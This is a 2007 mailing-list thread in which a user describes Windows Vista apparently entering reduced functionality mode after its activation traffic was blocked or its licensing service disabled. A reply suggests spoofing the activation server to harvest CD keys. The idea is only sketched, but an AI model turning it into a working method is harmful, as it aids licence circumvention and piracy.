lol, I want to see this happen in a .edu unit where you can only access the
internet by going through a limited HTTP proxy that does not allow the
connect function; I think it would give humorous results. Unless it 'phones
home' by visiting a page and printing said info, in which case it would
probably be simple enough to modify the server it goes to and make it think
it's going to Microsoft; in that event you could easily get CD keys if that's
how it verifies it's a real Vista copy.

On 1/1/07, Geo. <[EMAIL PROTECTED]> wrote:



> It just can't be that simple. There has to be more to what happened to
> the guy. Lots of computers are offline for several days at a time, it's
> inconceivable that they didn't test that.

Ok, as complete as I can be in the few minutes I have to post this.

During those three days I did a lot of poking around, stopping and
starting
services, switching from wired to wireless and back, trying to view high
def
video (which I still am not able to do in any video player except WMP for
some reason) installing codecs and software, running into the event ID
4226
tcp security connect limit, etc.

However I never got any notification of deactivation or any problem of
that
sort. Then on the third day suddenly solitaire would not start up and I
couldn't get into network properties. I did a bunch of rebooting and
trouble
shooting trying to figure that out but got nowhere.

So I went back to trying to get high def video to work in Media player
classic and figured perhaps it was trying to download a codec so I removed
the routes. It didn't help the video but I quickly found network
properties
started working. So then I tried solitaire and it worked. This was all
directly after removing the routes, there wasn't but a few minutes between
letting it talk to the net and these apps starting to work again.

I decided this was probably reduced functionality in action but since I
had
never seen it before I needed some way to trigger it so I could compare
since it would take 3 days to reproduce with route blocking. I disabled
the
software licensing service since it claims disabling that service will
kick
off reduced functionality mode. Nothing happened immediately but 24 hours
later solitaire and network properties (and now control panel) would not
start up. It was exactly the same apps and behavior. I enabled and started
the software licensing service and in seconds things returned to fully
functional just like removing the routes did.

So it's possible the routes didn't trigger it, but removing them sure
cured
it quickly so that is my guess at this point. Further testing is needed. I
won't be testing it for a couple days as I need the laptop connected to
other networks to try some other software I need to test. (that tcp limit
may prove a problem for network monitoring)

Geo.
